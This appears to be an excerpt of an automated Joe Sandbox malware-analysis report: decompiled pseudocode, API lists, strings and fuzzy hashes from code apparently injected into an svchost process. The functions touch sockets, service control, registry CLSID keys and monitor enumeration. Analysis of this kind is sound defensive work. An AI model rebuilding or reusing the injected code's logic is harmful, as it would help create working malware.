                                                            • Instruction Fuzzy Hash: D7218C33620650E7EBB19B69E08C3EC37A0FB85B5CF141411DA5A476A6DF3BC886CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E0000022B22BAF556190(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                            				void* _t23;
                                                            				void* _t25;
                                                            				long long _t34;
                                                            				void* _t50;
                                                            				void* _t54;
                                                            				void* _t55;
                                                            
                                                            				_t35 = __rbx;
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_t48 = __rdx;
                                                            				if ( *((intOrPtr*)( *__rcx + 0x230))() == 0) goto 0xaf556268;
                                                            				if (E0000022B22BAF556380( *((intOrPtr*)( *__rcx + 0x230))(), __rbx, __rcx, _t50) == 0) goto 0xaf556268;
                                                            				_t34 =  *__rcx;
                                                            				 *((intOrPtr*)(_t34 + 0x238))();
                                                            				if (E0000022B22BAF5564C0(_t23, _t25, __rcx, __rdx, _t50, _t54, _t55) == 0) goto 0xaf556250;
                                                            				r9d = 0;
                                                            				r8d = 0;
                                                            				CreateIoCompletionPort(??, ??, ??, ??);
                                                            				 *((long long*)(__rcx + 0x68)) = _t34;
                                                            				if (_t34 != 0) goto 0xaf556214;
                                                            				GetLastError();
                                                            				 *((intOrPtr*)(__rcx + 0x74)) = 7;
                                                            				SetLastError(??);
                                                            				if ( *((long long*)(__rcx + 0x68)) == 0) goto 0xaf556250;
                                                            				if (E0000022B22BAF556630(_t35, __rcx, _t48) == 0) goto 0xaf556250;
                                                            				 *((intOrPtr*)(__rcx + 0x60)) = r8d;
                                                            				 *((intOrPtr*)(__rcx + 0x70)) = 1;
                                                            				ResetEvent(??);
                                                            				return 1;
                                                            			}









                                                            0x22baf556190
                                                            0x22baf556190
                                                            0x22baf556195
                                                            0x22baf5561a5
                                                            0x22baf5561b3
                                                            0x22baf5561c3
                                                            0x22baf5561c9
                                                            0x22baf5561cf
                                                            0x22baf5561e2
                                                            0x22baf5561e4
                                                            0x22baf5561e7
                                                            0x22baf5561f0
                                                            0x22baf5561f6
                                                            0x22baf5561fd
                                                            0x22baf5561ff
                                                            0x22baf556207
                                                            0x22baf55620e
                                                            0x22baf556219
                                                            0x22baf556225
                                                            0x22baf55622b
                                                            0x22baf55622e
                                                            0x22baf556235
                                                            0x22baf55624f

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CompletionCreateEventPortResetSwitchThreadbindclosesocketsocket
                                                            • String ID:
                                                            • API String ID: 3234443784-0
                                                            • Opcode ID: 7486dc4a14163c4b92c5367f48587c33ea993da1e3b254e1d047567bec8d3750
                                                            • Instruction ID: caf0987cb50a1a5b1ac04ea1ff6568fd162b7e51697449cfb8caa377be6b295d
                                                            • Opcode Fuzzy Hash: 7486dc4a14163c4b92c5367f48587c33ea993da1e3b254e1d047567bec8d3750
                                                            • Instruction Fuzzy Hash: E7215332315A80A2EB659BA6E65C3AD33A1FB88BD4F044624DF1A47BD6DF39C465C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F41(void* __rax, long long __rbx, long long _a344) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t22;
                                                            				void* _t24;
                                                            				void* _t32;
                                                            				void* _t33;
                                                            				void* _t34;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t22);
                                                            				goto 0xaf546b40;
                                                            				_a344 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t22, _t24, _t32, _t33, _t34);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t22 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}











                                                            0x22baf545f41
                                                            0x22baf545f6d
                                                            0x22baf545f6e
                                                            0x22baf545f73
                                                            0x22baf545f78
                                                            0x22baf545f83
                                                            0x22baf545f88
                                                            0x22baf545f92
                                                            0x22baf545f95
                                                            0x22baf545f9b
                                                            0x22baf545fb3

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$ControlManagerQueryStatus
                                                            • String ID:
                                                            • API String ID: 3062456870-0
                                                            • Opcode ID: 877ce3d78f54c526d212d21d359dd48037ddc92e85cf3c8fe00ce85f34946793
                                                            • Instruction ID: 53bc310181e8c11e72a4c0c6a3e9318cceaa9bb3be5c73f31e27d115e7ce9a98
                                                            • Opcode Fuzzy Hash: 877ce3d78f54c526d212d21d359dd48037ddc92e85cf3c8fe00ce85f34946793
                                                            • Instruction Fuzzy Hash: AD11AC32704B00E6EE228BA2A40C3AAB3E1FB89BC1F040124DE8D4375AEF39C400CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F37(void* __rax, long long __rbx, long long _a400) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t23;
                                                            				void* _t25;
                                                            				void* _t34;
                                                            				void* _t35;
                                                            				void* _t36;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t23);
                                                            				goto 0xaf546b40;
                                                            				_a400 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t23, _t25, _t34, _t35, _t36);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t23 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}











                                                            0x22baf545f37
                                                            0x22baf545f6d
                                                            0x22baf545f6e
                                                            0x22baf545f73
                                                            0x22baf545f78
                                                            0x22baf545f83
                                                            0x22baf545f88
                                                            0x22baf545f92
                                                            0x22baf545f95
                                                            0x22baf545f9b
                                                            0x22baf545fb3

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$ManagerQueryStartStatus
                                                            • String ID:
                                                            • API String ID: 2710452061-0
                                                            • Opcode ID: 4807622e4c719f33e40f950f366c8c14e5692b112fb228f5abcd59ef7a6602f5
                                                            • Instruction ID: bc0a6076f7c7396f2021812269c74581e3d574d22d54051d7767c0c8d881af41
                                                            • Opcode Fuzzy Hash: 4807622e4c719f33e40f950f366c8c14e5692b112fb228f5abcd59ef7a6602f5
                                                            • Instruction Fuzzy Hash: 39119632705740A2FF268BA6A95D36AB7D2FB48FC1F444434DE4E4375ADF2AD4458600
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E0000022B22BAF53D9E0(void* __eflags) {
                                                            				void* _t1;
                                                            				void* _t2;
                                                            				void* _t5;
                                                            				void* _t6;
                                                            				void* _t7;
                                                            
                                                            				_t1 = E0000022B22BAF53D900(_t2, __eflags, _t5, _t6, _t7);
                                                            				if (_t1 != 0) goto 0xaf53d9f2;
                                                            				return _t1;
                                                            			}








                                                            0x22baf53d9e4
                                                            0x22baf53d9eb
                                                            0x22baf53d9f1

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CreateHeap$AttributesCloseEventFreeHandleMappingObjectProcessSingleViewWait
                                                            • String ID: winssyslog
                                                            • API String ID: 3551488937-1874786851
                                                            • Opcode ID: f79453b3fee362649bcad1cbffb12053d73b19f29dd28a8daf5bc55a0fa96937
                                                            • Instruction ID: 6d567654452b1b48d990b4d7c6bc13eeb656bcd3dbf81d1758421e3ff30e3a71
                                                            • Opcode Fuzzy Hash: f79453b3fee362649bcad1cbffb12053d73b19f29dd28a8daf5bc55a0fa96937
                                                            • Instruction Fuzzy Hash: C131A233214B84A2EB22DFA6E89D3CD73A2F795754F444115DA4943BAACF7AC155CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1183003970
                                                            • Opcode ID: 8b88a278287665879cb75361c8b551d8a1adabaa16cdfb5a2ff20eff31858a0f
                                                            • Instruction ID: ae2a572b789f27726f3cf00544ef8ca086172ccf38a358a0d9e62effb3757def
                                                            • Opcode Fuzzy Hash: 8b88a278287665879cb75361c8b551d8a1adabaa16cdfb5a2ff20eff31858a0f
                                                            • Instruction Fuzzy Hash: 0F21C173204B85A2EB318FA4F4DC3DEB7A0F788394F840125E68943A2ADF79C108CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MonitorWindow$DesktopDisplayEnumFromInfoSettings
                                                            • String ID: h
                                                            • API String ID: 1862586070-2439710439
                                                            • Opcode ID: a5b2284068188970d6261ae4c30728a367663877468abd87794ab0a28de3ead9
                                                            • Instruction ID: 025f710e07214c73ee4a7db031b2e48f49e45b53c5f7bfd2a94e1055a3a76a3d
                                                            • Opcode Fuzzy Hash: a5b2284068188970d6261ae4c30728a367663877468abd87794ab0a28de3ead9
                                                            • Instruction Fuzzy Hash: 9121AF33604B849AD772CF71E44838AB3A1FB88B80F408226DA9D1370ADF39D542CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateWindow$EventHandle
                                                            • String ID: #32770
                                                            • API String ID: 1958951703-463685578
                                                            • Opcode ID: f85c840273bf1d8db3b03ac71be4d2893478c020bccff294b04defcc709c6c95
                                                            • Instruction ID: 9d3bbd50f3417d8bbf3ab3206c6df0d229d37f2621d96cceca981cae58f33811
                                                            • Opcode Fuzzy Hash: f85c840273bf1d8db3b03ac71be4d2893478c020bccff294b04defcc709c6c95
                                                            • Instruction Fuzzy Hash: 99118433205B4192DB258FA4F5587E9B3E4FB98784F144125DE9947F59DF39C094CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 1b02e33b0d9a8706aff6f881ebefdd73711304efd7bfad34e36fe1fdddc9b5a9
                                                            • Instruction ID: f4d76fc0d74ee4e506fd1ee7e0393126bd6df486710eca9f3ecb569cd3d4b2d5
                                                            • Opcode Fuzzy Hash: 1b02e33b0d9a8706aff6f881ebefdd73711304efd7bfad34e36fe1fdddc9b5a9
                                                            • Instruction Fuzzy Hash: C5F0C223225B41A2EFA68BD1F45C3EA3360EB88B90F480419A94B4276ADF3DC484C300
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E0000022B22BAF543E20(void* __ecx, void* __edx, long long __rax, long long __rcx, void* __rdx, void* __r8, void* __r9, long long __r12) {
                                                            				void* __rbx;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* __r14;
                                                            				void* _t164;
                                                            				void* _t166;
                                                            				intOrPtr _t177;
                                                            				long long _t185;
                                                            				long long _t189;
                                                            				short* _t190;
                                                            				void* _t197;
                                                            				void* _t208;
                                                            				int _t229;
                                                            				intOrPtr _t230;
                                                            				intOrPtr _t233;
                                                            				void** _t235;
                                                            				void* _t236;
                                                            				signed int _t239;
                                                            				void* _t243;
                                                            				void* _t244;
                                                            				void* _t246;
                                                            				void* _t247;
                                                            				long long _t253;
                                                            				signed int _t257;
                                                            				short* _t263;
                                                            				int _t265;
                                                            				short* _t269;
                                                            				void* _t271;
                                                            				short* _t273;
                                                            
                                                            				_t185 = __rax;
                                                            				 *((long long*)(_t246 + 8)) = __rcx;
                                                            				_t244 = _t246 - 0x27;
                                                            				_t247 = _t246 - 0xc0;
                                                            				_t257 = __rdx + 1;
                                                            				r14d = 0;
                                                            				r9d = __r8 - 1;
                                                            				 *(_t244 - 0x21) = _t257;
                                                            				_t253 = __r9 + _t257;
                                                            				 *(_t244 - 0x19) = r14d;
                                                            				 *((long long*)(_t244 - 0x29)) = _t253;
                                                            				_t236 = __rdx;
                                                            				if (_t253 - _t257 - 4 >= 0) goto 0xaf543e73;
                                                            				 *(_t244 - 0x19) = 1;
                                                            				goto 0xaf543e7e;
                                                            				 *(_t244 - 0x21) = _t257 + 4;
                                                            				E0000022B22BAF543530(_t244 - 0x29);
                                                            				 *((long long*)(_t244 + 0xf)) = _t185;
                                                            				if ( *(_t244 - 0x19) != r14d) goto 0xaf54419b;
                                                            				asm("xorps xmm0, xmm0");
                                                            				 *(_t244 - 0x19) = r14d;
                                                            				asm("movdqu [ebp-0x29], xmm0");
                                                            				E0000022B22BAF53DE20(__edx, _t185, _t197, _t244 - 0x29, _t236, _t236, _t269);
                                                            				 *(_t244 - 0x11) = r14d;
                                                            				r9d = 0x20119;
                                                            				 *(_t247 + 0x20) = _t244 - 9;
                                                            				r8d = 0;
                                                            				 *(_t244 + 0x6f) = r14d;
                                                            				 *(_t244 + 0x7f) = r14d;
                                                            				 *(_t244 - 9) = _t269;
                                                            				if (RegOpenKeyExW(_t271, _t269, _t265, _t229, _t235) != 0) goto 0xaf54414a;
                                                            				 *(_t247 + 0x58) = _t269;
                                                            				r9d = 0;
                                                            				 *(_t247 + 0x50) = _t269;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t247 + 0x48)) = _t244 + 0x7f;
                                                            				 *((long long*)(_t247 + 0x40)) = _t244 + 0x6f;
                                                            				_t189 = _t244 - 0x11;
                                                            				 *((long long*)(_t247 + 0x38)) = _t189;
                                                            				 *(_t247 + 0x30) = _t269;
                                                            				 *(_t247 + 0x28) = _t269;
                                                            				 *(_t247 + 0x20) = _t269;
                                                            				if (RegQueryInfoKeyW(_t243, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf54414a;
                                                            				if ( *(_t244 - 0x11) - 1 < 0) goto 0xaf54414a;
                                                            				 *((long long*)(_t247 + 0xb8)) = __r12;
                                                            				 *((intOrPtr*)(_t244 - 0x31)) =  *(_t244 + 0x6f) + 1;
                                                            				_t190 =  <  ? 0xffffffff : _t189;
                                                            				E0000022B22BAF55A828(2 *  *(_t244 - 9) >> 0x20, _t190);
                                                            				_t273 = _t190;
                                                            				E0000022B22BAF55A828(2 *  *(_t244 - 9) >> 0x20, _t190);
                                                            				 *(_t244 + 7) = _t190;
                                                            				 *((long long*)(_t247 + 0x38)) = _t244 + 0x77;
                                                            				 *((intOrPtr*)(_t244 - 0x31)) =  *(_t244 + 0x6f) + 1;
                                                            				 *(_t244 + 0x77) =  *(_t244 + 0x7f);
                                                            				 *(_t247 + 0x30) = _t190;
                                                            				 *(_t247 + 0x28) = _t244 - 0xd;
                                                            				 *(_t247 + 0x20) = _t269;
                                                            				if (RegEnumValueW(??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf54411e;
                                                            				 *(_t244 - 0x39) =  *(_t244 - 0xd);
                                                            				r8d = 4;
                                                            				 *((intOrPtr*)(_t244 - 1)) = r14d + 1;
                                                            				E0000022B22BAF53DE20(0, _t244 - 0xd, _t197, _t244 - 0x29, _t244 - 0x39, 0xffffffff, _t269);
                                                            				if ( *_t273 != r14w) goto 0xaf543ff1;
                                                            				r8d = 2;
                                                            				E0000022B22BAF53DE20(0, 0, _t197, _t244 - 0x29, _t273, 0xffffffff, _t269);
                                                            				r8d = 4;
                                                            				 *(_t244 - 0x39) =  *(_t244 + 0x77);
                                                            				_t208 = _t244 - 0x29;
                                                            				E0000022B22BAF53DE20(0, 0, _t197, _t208, _t244 - 0x39, 0xffffffff, _t269);
                                                            				_t230 =  *((intOrPtr*)(_t244 - 0x29));
                                                            				 *(_t244 - 0x39) =  *(_t244 + 0x77);
                                                            				if (_t230 != 0) goto 0xaf544041;
                                                            				goto 0xaf544046;
                                                            				r13d = 0 + _t208;
                                                            				if (r13d -  *(_t244 - 0x19) < 0) goto 0xaf5440ad;
                                                            				r13d = r13d + 0x3ff;
                                                            				r13d = r13d & 0xfffffc00;
                                                            				E0000022B22BAF55A828(0, _t208);
                                                            				if (0 == 0) goto 0xaf5440a9;
                                                            				_t177 = _t230;
                                                            				if (_t177 != 0) goto 0xaf544078;
                                                            				goto 0xaf544093;
                                                            				if (_t177 == 0) goto 0xaf54408b;
                                                            				r8d = r14d -  *((intOrPtr*)(_t244 - 0x29));
                                                            				E0000022B22BAF562BA0(r13d, r8d, _t164, _t166, 0, _t230, _t230, 0xffffffff, _t273);
                                                            				E0000022B22BAF55A7E4(0, _t230);
                                                            				 *((long long*)(_t244 - 0x29)) = 0;
                                                            				 *(_t244 - 0x19) = r13d;
                                                            				goto 0xaf5440b1;
                                                            				_t263 =  *(_t244 + 7);
                                                            				_t239 =  *(_t244 - 0x21);
                                                            				r8d =  *(_t244 - 0x39);
                                                            				E0000022B22BAF562BA0(r13d, r8d, r14d -  *((intOrPtr*)(_t244 - 0x29)), _t166, _t239, _t263, 0, _t239, _t273);
                                                            				 *((intOrPtr*)(_t244 - 0x31)) =  *(_t244 + 0x6f) + 1;
                                                            				 *(_t244 + 0x77) =  *(_t244 + 0x7f);
                                                            				 *((long long*)(_t247 + 0x38)) = _t244 + 0x77;
                                                            				 *(_t247 + 0x30) = _t263;
                                                            				 *(_t247 + 0x28) = _t244 - 0xd;
                                                            				 *(_t247 + 0x20) = _t269;
                                                            				 *(_t244 - 0x21) = _t239 + _t197;
                                                            				if (RegEnumValueW(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0xaf543fd0;
                                                            				goto 0xaf544122;
                                                            				if (_t273 == 0) goto 0xaf54412f;
                                                            				E0000022B22BAF55A7E4(_t244 - 0xd, _t273);
                                                            				if (_t263 == 0) goto 0xaf54413c;
                                                            				E0000022B22BAF55A7E4(_t244 - 0xd, _t263);
                                                            				goto 0xaf54414e;
                                                            				_t233 =  *((intOrPtr*)(_t244 - 0x29));
                                                            				if ( *(_t244 - 9) == 0) goto 0xaf54415d;
                                                            				RegCloseKey(_t197);
                                                            				if ( *((intOrPtr*)(_t244 + 0xf)) == 0) goto 0xaf54416a;
                                                            				E0000022B22BAF55A7E4(_t244 - 0xd,  *((intOrPtr*)(_t244 + 0xf)));
                                                            				if (_t233 != 0) goto 0xaf544174;
                                                            				goto 0xaf54417f;
                                                            				r14d =  *(_t244 - 0x21);
                                                            				r14d = r14d -  *((intOrPtr*)(_t244 - 0x29));
                                                            				r9b = 0x3f;
                                                            				r8d = r14d;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)( *((intOrPtr*)(_t244 + 0x67)) + 8)), _t233);
                                                            				if (_t233 == 0) goto 0xaf54419b;
                                                            				return E0000022B22BAF55A7E4(_t244 - 0xd, _t233);
                                                            			}
































                                                            0x22baf543e20
                                                            0x22baf543e20
                                                            0x22baf543e2f
                                                            0x22baf543e34
                                                            0x22baf543e3b
                                                            0x22baf543e3f
                                                            0x22baf543e42
                                                            0x22baf543e46
                                                            0x22baf543e4a
                                                            0x22baf543e4d
                                                            0x22baf543e51
                                                            0x22baf543e5b
                                                            0x22baf543e65
                                                            0x22baf543e67
                                                            0x22baf543e71
                                                            0x22baf543e7a
                                                            0x22baf543e82
                                                            0x22baf543e8a
                                                            0x22baf543e92
                                                            0x22baf543e98
                                                            0x22baf543e9b
                                                            0x22baf543ea9
                                                            0x22baf543eae
                                                            0x22baf543eb7
                                                            0x22baf543ebb
                                                            0x22baf543ec1
                                                            0x22baf543ec6
                                                            0x22baf543ec9
                                                            0x22baf543ed0
                                                            0x22baf543ed7
                                                            0x22baf543ee3
                                                            0x22baf543ef1
                                                            0x22baf543ef6
                                                            0x22baf543ef9
                                                            0x22baf543efe
                                                            0x22baf543f01
                                                            0x22baf543f0c
                                                            0x22baf543f11
                                                            0x22baf543f15
                                                            0x22baf543f1a
                                                            0x22baf543f1f
                                                            0x22baf543f24
                                                            0x22baf543f31
                                                            0x22baf543f3b
                                                            0x22baf543f4d
                                                            0x22baf543f5a
                                                            0x22baf543f65
                                                            0x22baf543f6c
                                                            0x22baf543f74
                                                            0x22baf543f77
                                                            0x22baf543f86
                                                            0x22baf543f90
                                                            0x22baf543f98
                                                            0x22baf543fa4
                                                            0x22baf543fab
                                                            0x22baf543fb0
                                                            0x22baf543fb5
                                                            0x22baf543fc2
                                                            0x22baf543fd9
                                                            0x22baf543fdc
                                                            0x22baf543fe2
                                                            0x22baf543fe9
                                                            0x22baf543ffb
                                                            0x22baf543ffd
                                                            0x22baf54400c
                                                            0x22baf544018
                                                            0x22baf54401e
                                                            0x22baf544021
                                                            0x22baf544025
                                                            0x22baf54402a
                                                            0x22baf544034
                                                            0x22baf54403a
                                                            0x22baf54403f
                                                            0x22baf544046
                                                            0x22baf54404e
                                                            0x22baf544050
                                                            0x22baf544057
                                                            0x22baf544061
                                                            0x22baf54406c
                                                            0x22baf54406e
                                                            0x22baf544071
                                                            0x22baf544076
                                                            0x22baf54407b
                                                            0x22baf54407d
                                                            0x22baf544086
                                                            0x22baf54408e
                                                            0x22baf54409b
                                                            0x22baf5440a3
                                                            0x22baf5440a7
                                                            0x22baf5440a9
                                                            0x22baf5440ad
                                                            0x22baf5440b7
                                                            0x22baf5440bd
                                                            0x22baf5440d5
                                                            0x22baf5440e0
                                                            0x22baf5440e7
                                                            0x22baf5440f0
                                                            0x22baf5440f5
                                                            0x22baf5440fa
                                                            0x22baf5440ff
                                                            0x22baf544112
                                                            0x22baf54411c
                                                            0x22baf544125
                                                            0x22baf54412a
                                                            0x22baf544132
                                                            0x22baf544137
                                                            0x22baf544148
                                                            0x22baf54414a
                                                            0x22baf544155
                                                            0x22baf544157
                                                            0x22baf544160
                                                            0x22baf544165
                                                            0x22baf54416d
                                                            0x22baf544172
                                                            0x22baf544174
                                                            0x22baf54417b
                                                            0x22baf544183
                                                            0x22baf544186
                                                            0x22baf544189
                                                            0x22baf544191
                                                            0x22baf5441ac

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnumValue$CloseInfoOpenQuery
                                                            • String ID:
                                                            • API String ID: 2078201404-0
                                                            • Opcode ID: 83162b61470ba83eb88d29ba9d3dbb23d9ec0a17486f358d6ca758ff64ef6407
                                                            • Instruction ID: 5077d403cad029c9abe2ca623ef2cb08f5a50e62705759f5527bedbf1e7e8256
                                                            • Opcode Fuzzy Hash: 83162b61470ba83eb88d29ba9d3dbb23d9ec0a17486f358d6ca758ff64ef6407
                                                            • Instruction Fuzzy Hash: 29B1AE33B10A40AAEB21DFA1E4896DD77B6F348788F400225EE4A27F9ADF35C515CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 38%
                                                            			E0000022B22BAF575FD8(signed int __edx, void* __edi, void* __esi, void* __esp, long long __rbx, signed long long __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
                                                            				signed int _v72;
                                                            				char _v80;
                                                            				intOrPtr _v87;
                                                            				char _v88;
                                                            				long long _v96;
                                                            				long long _v104;
                                                            				int _v108;
                                                            				intOrPtr _v112;
                                                            				short _v116;
                                                            				char _v120;
                                                            				signed long long _v128;
                                                            				signed long long _v136;
                                                            				intOrPtr _v144;
                                                            				signed int _v152;
                                                            				void* __rsi;
                                                            				int _t80;
                                                            				signed char _t87;
                                                            				signed long long _t118;
                                                            				intOrPtr* _t127;
                                                            				signed long long _t129;
                                                            				intOrPtr _t138;
                                                            				signed long long _t142;
                                                            				void* _t145;
                                                            				signed long long _t148;
                                                            				void* _t150;
                                                            				void* _t158;
                                                            				void* _t159;
                                                            				signed long long _t163;
                                                            
                                                            				_t129 = __rcx;
                                                            				_a8 = __rbx;
                                                            				_t118 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v72 = _t118 ^ _t150 - 0x00000080;
                                                            				r12d = r9d;
                                                            				_t163 = __edx >> 6;
                                                            				_t148 = __edx << 6;
                                                            				_v96 = __r8;
                                                            				_t127 = __rcx;
                                                            				_t159 = _t158 + __r8;
                                                            				_v104 = 0xaf599790;
                                                            				_v108 = GetConsoleCP();
                                                            				 *__rcx = __rdx;
                                                            				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                            				if (__r8 - _t159 >= 0) goto 0xaf5761b6;
                                                            				r13b =  *((intOrPtr*)(__r8));
                                                            				_v120 = 0;
                                                            				_t138 =  *((intOrPtr*)(0xaf599790 + _t163 * 8));
                                                            				_t87 =  *(_t138 + _t148 + 0x3d);
                                                            				if ((_t87 & 0x00000004) == 0) goto 0xaf57608b;
                                                            				 *(_t138 + _t148 + 0x3d) = _t87 & 0x000000fb;
                                                            				r8d = 2;
                                                            				_v88 =  *((intOrPtr*)(_t138 + _t148 + 0x3e));
                                                            				_v87 = r13b;
                                                            				goto 0xaf5760d0;
                                                            				E0000022B22BAF570308(_t87 & 0x000000fb, 0,  *((intOrPtr*)( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x28)), __rcx, __rcx,  &_v88, __r9);
                                                            				if (( *(0xaf599790 + _t129 * 2) & 0x00008000) == 0) goto 0xaf5760c7;
                                                            				if (__r8 - _t159 >= 0) goto 0xaf576196;
                                                            				r8d = 2;
                                                            				if (E0000022B22BAF571FB4(0x8000, __edi, __esp,  *((intOrPtr*)( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x28)), _t127,  &_v120, __r8, _t148, __r8) == 0xffffffff) goto 0xaf5761b6;
                                                            				_t145 = __r8 + 1;
                                                            				goto 0xaf5760e2;
                                                            				r8d = 1;
                                                            				if (E0000022B22BAF571FB4(0x8000, __edi, __esp,  *((intOrPtr*)( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x28)), _t127,  &_v120, _t145, _t148, __r8) == 0xffffffff) goto 0xaf5761b6;
                                                            				_v128 = _v128 & 0x00000000;
                                                            				_v136 = _v136 & 0x00000000;
                                                            				r9d = 1;
                                                            				_v144 = 5;
                                                            				_v152 =  &_v80;
                                                            				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                                                            				r14d = _t80;
                                                            				if (_t80 == 0) goto 0xaf5761b6;
                                                            				_v152 = _v152 & 0x00000000;
                                                            				_t142 =  &_v80;
                                                            				r8d = _t80;
                                                            				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xaf5761ae;
                                                            				 *((intOrPtr*)(_t127 + 4)) =  *((intOrPtr*)(_t127 + 8)) - _v96 + __edi;
                                                            				if (_v112 - r14d < 0) goto 0xaf5761b6;
                                                            				if (r13b != 0xa) goto 0xaf57618e;
                                                            				_t50 = _t142 + 0xd; // 0xd
                                                            				_v152 = _t142;
                                                            				_t52 = _t142 + 1; // 0x1
                                                            				r8d = _t52;
                                                            				_v116 = _t50;
                                                            				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xaf5761ae;
                                                            				if (_v112 - 1 < 0) goto 0xaf5761b6;
